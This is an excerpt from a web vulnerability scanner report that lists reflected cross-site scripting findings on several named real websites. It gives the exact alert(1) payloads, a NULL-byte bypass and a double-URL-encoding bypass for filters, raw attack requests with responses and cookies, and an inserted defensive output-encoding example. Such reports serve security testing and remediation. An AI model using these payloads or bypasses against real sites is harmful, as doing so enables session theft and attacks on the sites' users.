3.260. http://redcated/K01/iview/208297447/direct/01/5244128 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://redcated
Path: /K01/iview/208297447/direct/01/5244128
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00aaa72"-alert(1)-"43562ce68f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as aaa72"-alert(1)-"43562ce68f8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
3.261. http://redcated/K01/iview/208297447/direct/01/5244128 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://redcated
Path: /K01/iview/208297447/direct/01/5244128
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 691a0"><script>alert(1)</script>7cc1b80313d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the click request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10797"><script>alert(1)</script>ca7d243139f was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
3.263. http://redcated/NYC/iview/266847916/direct/01/8785527227 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://redcated
Path: /NYC/iview/266847916/direct/01/8785527227
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae810"><script>alert(1)</script>669f830fd20 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3fae'%3baef8df1f9d8 was submitted in the REST URL parameter 4. This input was echoed as f3fae';aef8df1f9d8 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e2ef6'-alert(1)-'e997e664d68 was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
var nRequiredVersion = 8; var bIsRightVersion = fal ...[SNIP]... 393687.replace(/!~!click!~!/g,'http://r1.ace.advertising.com/click/site=0000774938/mnum=0000894884/cstr=31084711=_4ce06bb2,4244084227,774938^894884^1183^0,1_/xsxdata=$xsxdata/bnum=31084711/optn=64?trg=e2ef6'-alert(1)-'e997e664d68');
The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 85557"-alert(1)-"a23d99095eb was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
if (!window.armapi_a1_a1) { var armapi_a1_a1 = { initialize : function(unique_i ...[SNIP]...
3.267. http://redcated/TLC/jview/242390407/direct/01 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://redcated
Path: /TLC/jview/242390407/direct/01
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a04a9"-alert(1)-"587ca1d221a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
if (!window.armapi_a1_a1) { var armapi_a1_a1 = { initialize : function(unique ...[SNIP]...
3.268. http://redcated/TLC/jview/242390407/direct/01 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://redcated
Path: /TLC/jview/242390407/direct/01
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3044d'-alert(1)-'dd742439b22 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
var nRequiredVersion = 8; var bIsRightVersion = fal ...[SNIP]... 40642.replace(/!~!click!~!/g,'http://r1.ace.advertising.com/click/site=0000774938/mnum=0000894884/cstr=31084711=_4ce06bb2,4244084227,774938^894884^1183^0,1_/xsxdata=$xsxdata/bnum=31084711/optn=64?trg=&3044d'-alert(1)-'dd742439b22=1');
The value of the brand request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be8ab"><script>alert(1)</script>bb838291dac was submitted in the brand parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cgi-bin/findweather/getForecast?brand=mercurynewsbe8ab"><script>alert(1)</script>bb838291dac&query=san+jose&searchbutton.x=8&searchbutton.y=8&searchbutton=Search HTTP/1.1
Host: weather.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; ASC=1289776044:1; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:10:46 GMT
Server: Apache/1.3.33 (Unix) PHP/4.4.0
X-CreationTime: 0.060
Set-Cookie: ASC=1289787046:2; path=/; expires=Fri, 01-Jan-2020 00:00:00 GMT; domain=.wunderground.com
Connection: close
Content-Type: text/html
Content-Length: 25776
<HTML> <head> <title>Weather </title> </head> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <meta HTTP-EQUIV="Pragma" CONTENT"no-cache"> <title>San Jose Mercury N ...[SNIP]... <a href="/auto/mercurynewsbe8ab"><script>alert(1)</script>bb838291dac/CA/San_Jose.html" OnClick='Set_Cookie( "DefLoc", "95101", 365, "/", "mercurynews.com", "");'> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a677a"-alert(1)-"e4b91c7cfde was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bookmark.phpa677a"-alert(1)-"e4b91c7cfde HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 404 Not Found
Date: Sun, 14 Nov 2010 23:22:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=p5e989npde96lmtduu4317muj1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1447
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <script type="text/javascript"> var u = "/404/bookmark.phpa677a"-alert(1)-"e4b91c7cfde"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = _gat._get ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 56a0b<script>alert(1)</script>342cda23827 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /bookmark.php56a0b<script>alert(1)</script>342cda23827 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 404 Not Found
Date: Sun, 14 Nov 2010 23:22:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=gdbbnbffagiile5na2engvtop4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1473
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <strong>bookmark.php56a0b<script>alert(1)</script>342cda23827</strong> ...[SNIP]...
3.272. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.addthis.com
Path: /bookmark.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 371c7"-alert(1)-"25c58f01b1b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bookmark.php/371c7"-alert(1)-"25c58f01b1b HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 23:22:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 88227
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <script type="text/javascript"> var u = "/bookmark.php/371c7"-alert(1)-"25c58f01b1b"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = _gat._get ...[SNIP]...
The value of the c request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 190a1</script><script>alert(1)</script>04f60eeb6e3 was submitted in the c parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /search/?location=San+Francisco&af=173684&c=cat_sf_htl190a1</script><script>alert(1)</script>04f60eeb6e3&client=ca-dp-godaddy2_xml HTTP/1.1
Host: www.airbnb.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of the location request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d6e92</script><script>alert(1)</script>2baec830013 was submitted in the location parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /search/?location=San+Franciscod6e92</script><script>alert(1)</script>2baec830013&af=173684&c=cat_sf_htl&client=ca-dp-godaddy2_xml HTTP/1.1
Host: www.airbnb.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
3.275. http://www.ajmoss.com/bedding.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ajmoss.com
Path: /bedding.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9446a"><script>alert(1)</script>e1616c188ad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /bedding.php/9446a"><script>alert(1)</script>e1616c188ad HTTP/1.1
Host: www.ajmoss.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:10:49 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=odgh07aucl6q1h0vc0beveup71; path=/; domain=www.ajmoss.com
Set-Cookie: sortmethod=0; expires=Fri, 19-Nov-2010 06:10:50 GMT; path=/
P3P: policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa OUR NOR IND UNI COM NAV INT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22014
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title>Made in the USA | Bedding by Aj MOSS</title> <meta http-e ...[SNIP]... <a href="/cart.php?frompage=/bedding.php/9446a"><script>alert(1)</script>e1616c188ad" rel="nofollow"> ...[SNIP]...
3.276. http://www.ajmoss.com/bedding.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ajmoss.com
Path: /bedding.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript rest-of-line comment. The payload c721c%0aalert(1)//5c5bd7b7e5c was submitted in the name of an arbitrarily supplied request parameter. The %0a decodes to a newline, which terminates the // comment, so the alert(1) that follows is placed on a new line outside the comment and is executed as code. This input was echoed as c721c, a newline, and alert(1)//5c5bd7b7e5c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bedding.php/c721c%0aalert(1)//5c5bd7b7e5c HTTP/1.1
Host: www.ajmoss.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:10:50 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=9gk3vqpvca4v1evvhkkd9qtdi2; path=/; domain=www.ajmoss.com
Set-Cookie: sortmethod=0; expires=Fri, 19-Nov-2010 06:10:50 GMT; path=/
P3P: policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa OUR NOR IND UNI COM NAV INT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21981
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title>Made in the USA | Bedding by Aj MOSS</title> <meta http-e ...[SNIP]... <!--
window.addEvent('domready', function(){ var menupos = 0; AccordionInit(menupos); new SmoothScroll(); //countdown(); //cjax_update('/bedding.php/c721c alert(1)//5c5bd7b7e5c'); }); //--> ...[SNIP]...
The value of the redir request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7060"><script>alert(1)</script>9f0809a562 was submitted in the redir parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /action_flag.shtml?flag_login=1&view_flag_menu=1&redir=%2Farticle%2F6007620%2Fchildhood_obesity_news_san_francisco.htmlc7060"><script>alert(1)</script>9f0809a562 HTTP/1.1
Host: www.associatedcontent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: c=MTc0MTIyMjMyMTg3NzU3MzUx; ACSESS=bunc6586kdrk769qu85umchs65; cs=Ng%3D%3D;
The value of the comment_name request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4791d"><script>alert(1)</script>4fa19999f32 was submitted in the comment_name parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /recaptcha_iframe.shtml?disp_type=wide&content_type=article&content_type_id=6007620&comment_name=4791d"><script>alert(1)</script>4fa19999f32 HTTP/1.1
Host: www.associatedcontent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: c=MTc0MTIyMjMyMTg3NzU3MzUx; ACSESS=bunc6586kdrk769qu85umchs65; cs=Ng%3D%3D;
Response
HTTP/1.0 200 OK
Date: Sun, 14 Nov 2010 23:25:51 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 PHP/5.3.2
X-Powered-By: PHP/5.3.2
Vary: Accept-Encoding
Content-Length: 256
Connection: close
Content-Type: text/html
The value of the content_type request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 475f9"><script>alert(1)</script>a32fa17e26a was submitted in the content_type parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /recaptcha_iframe.shtml?disp_type=wide&content_type=475f9"><script>alert(1)</script>a32fa17e26a&content_type_id=6007620&comment_name= HTTP/1.1
Host: www.associatedcontent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: c=MTc0MTIyMjMyMTg3NzU3MzUx; ACSESS=bunc6586kdrk769qu85umchs65; cs=Ng%3D%3D;
Response
HTTP/1.0 200 OK
Date: Sun, 14 Nov 2010 23:25:43 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 PHP/5.3.2
X-Powered-By: PHP/5.3.2
Vary: Accept-Encoding
Content-Length: 249
Connection: close
Content-Type: text/html
The value of the content_type_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3df44"><script>alert(1)</script>2fc7b9358b was submitted in the content_type_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /recaptcha_iframe.shtml?disp_type=wide&content_type=article&content_type_id=3df44"><script>alert(1)</script>2fc7b9358b&comment_name= HTTP/1.1
Host: www.associatedcontent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: c=MTc0MTIyMjMyMTg3NzU3MzUx; ACSESS=bunc6586kdrk769qu85umchs65; cs=Ng%3D%3D;
Response
HTTP/1.0 200 OK
Date: Sun, 14 Nov 2010 23:25:46 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 PHP/5.3.2
X-Powered-By: PHP/5.3.2
Vary: Accept-Encoding
Content-Length: 248
Connection: close
Content-Type: text/html
The value of the disp_type request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9079"><script>alert(1)</script>daecc58a6e8 was submitted in the disp_type parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /recaptcha_iframe.shtml?disp_type=f9079"><script>alert(1)</script>daecc58a6e8&content_type=article&content_type_id=6007620&comment_name= HTTP/1.1
Host: www.associatedcontent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: c=MTc0MTIyMjMyMTg3NzU3MzUx; ACSESS=bunc6586kdrk769qu85umchs65; cs=Ng%3D%3D;
Response
HTTP/1.0 200 OK
Date: Sun, 14 Nov 2010 23:25:39 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 PHP/5.3.2
X-Powered-By: PHP/5.3.2
Vary: Accept-Encoding
Content-Length: 252
Connection: close
Content-Type: text/html
The value of the CC request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8acd"%3balert(1)//7612e955241 was submitted in the CC parameter. This input was echoed as d8acd";alert(1)//7612e955241 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the CC request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91221"style%3d"x%3aexpression(alert(1))"8b6472a2826 was submitted in the CC parameter. This input was echoed as 91221"style="x:expression(alert(1))"8b6472a2826 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated CSS expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of the PC request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 807f5"%3balert(1)//d5bb3c2d898 was submitted in the PC parameter. This input was echoed as 807f5";alert(1)//d5bb3c2d898 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the PC request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c04b"style%3d"x%3aexpression(alert(1))"a7b71ef0f59 was submitted in the PC parameter. This input was echoed as 4c04b"style="x:expression(alert(1))"a7b71ef0f59 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated CSS expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
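The findings above fall into two sink classes: a JavaScript string literal (the addthis, airbnb, ajmoss comment and CC/PC script-context items, whose remediation note says to keep user data out of that context where possible) and an HTML attribute value or element text (the brand, ajmoss, associatedcontent and CC/PC style-expression items, and the onerror items against www.godaddy.com further down). Where the data cannot be kept out of those contexts, the fallback is output encoding chosen for the exact context. The following is an added example, not code from any of the scanned sites or from the scanner: it shows both encoders and replays the report's payload shapes against them. The function names and the two page fragments are this example's own assumptions, modelled on the addthis `var u = "..."` script and the ajmoss cart link.

```javascript
// Added example, not code from the scanned sites or from the scanner: context-aware
// output encoding for the two sinks the findings above keep hitting, a JavaScript
// string literal and a double-quoted HTML attribute, plus a harness that replays
// the report's payload shapes to show the encoded form cannot leave its context.

// Escape a value for insertion INSIDE a JavaScript string literal of either quote
// style. Backslash, both quotes and line terminators are escaped, and < > / & are
// escaped as \xNN too, so a value containing "</script>" can never close the
// enclosing <script> element: the HTML parser finds that end tag before the JS
// parser ever runs, which is why quoting alone did not help the airbnb findings.
function jsStringEscape(value) {
  return String(value).replace(/[\\"'<>\/&\r\n\u2028\u2029]/g, (c) => {
    const code = c.charCodeAt(0);
    return code > 0xff
      ? "\\u" + code.toString(16).padStart(4, "0")
      : "\\x" + code.toString(16).padStart(2, "0");
  });
}

// Escape a value for insertion inside an HTML attribute value or element text.
// Encoding " stops attribute breakout (the "><script> and "onerror= payloads);
// encoding < > covers the plain-text-between-tags case as well.
function htmlEscape(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// The unsafe concatenation the addthis findings show: the request path goes
// straight into a script block.
function renderScriptUnsafe(path) {
  return 'var u = "' + path + '";';
}

// Same fragment with the value encoded for its context.
function renderScript(path) {
  return 'var u = "' + jsStringEscape(path) + '";';
}

// The ajmoss link, with the value encoded for the attribute context.
function renderLink(frompage) {
  return '<a href="/cart.php?frompage=' + htmlEscape(frompage) + '" rel="nofollow">';
}

// Evaluate a script fragment and return the value the page's own code would see in u.
function valueSeenByPage(fragment) {
  return new Function(fragment + " return u;")();
}

// True when evaluating the unsafe fragment runs the injected expression. alert is
// undefined outside a browser, so the attempt surfaces as a ReferenceError naming
// it rather than as a popup.
function unsafeFragmentRunsInjectedCode(path) {
  try {
    return valueSeenByPage(renderScriptUnsafe(path)) !== path;
  } catch (e) {
    return e instanceof ReferenceError && /alert/.test(e.message);
  }
}

// Payload shapes copied from the findings above (constructed inputs for this example).
const PAYLOADS = {
  dquote: 'a677a"-alert(1)-"e4b91c7cfde',
  squote: "3044d'-alert(1)-'dd742439b22",
  closeTag: "190a1</script><script>alert(1)</script>04f60eeb6e3",
  newline: "c721c\nalert(1)//5c5bd7b7e5c",
  attr: '9446a"><script>alert(1)</script>e1616c188ad',
  handler: 'fc22e"onerror="alert(1)"8e83204b2bd',
  styleExpr: '91221"style="x:expression(alert(1))"8b6472a2826',
};

// True when every payload round-trips through the encoded script as plain data
// and no rendered output still contains a token that could end its context.
function allPayloadsContained() {
  return Object.values(PAYLOADS).every((p) => {
    const script = renderScript(p);
    const attr = htmlEscape(p);
    return (
      valueSeenByPage(script) === p &&
      !/<\/script|[\r\n\u2028\u2029]/i.test(script) &&
      !/["<>]/.test(attr) &&
      renderLink(p).indexOf(attr) > 0
    );
  });
}
```

Two design points worth noting. jsStringEscape hex-escapes `<` and `/` even though they are harmless to the JavaScript grammar, because the HTML parser closes a `<script>` element on `</script` regardless of JavaScript quoting; that is what the airbnb `</script><script>` payloads exploit, and it is why the remediation note treats a script context as hard to defend by escaping alone. Line terminators are escaped for the same reason the ajmoss `%0a` finding works: a raw newline ends a rest-of-line comment, and U+2028/U+2029 end a string literal in older engines.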
3.286. http://www.godaddy.com/Hosting/Legacy.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.godaddy.com
Path: /Hosting/Legacy.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eed19%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7ad57768b1e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as eed19"><script>alert(1)</script>7ad57768b1e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Hosting/Legacy.aspx?eed19%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7ad57768b1e=1 HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 200 OK
Connection: close
Date: Sun, 14 Nov 2010 23:28:56 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=pf3l0lfa5o2nzenfz3ldab45; path=/; HttpOnly
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Mon, 14-Nov-2011 23:28:56 GMT; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
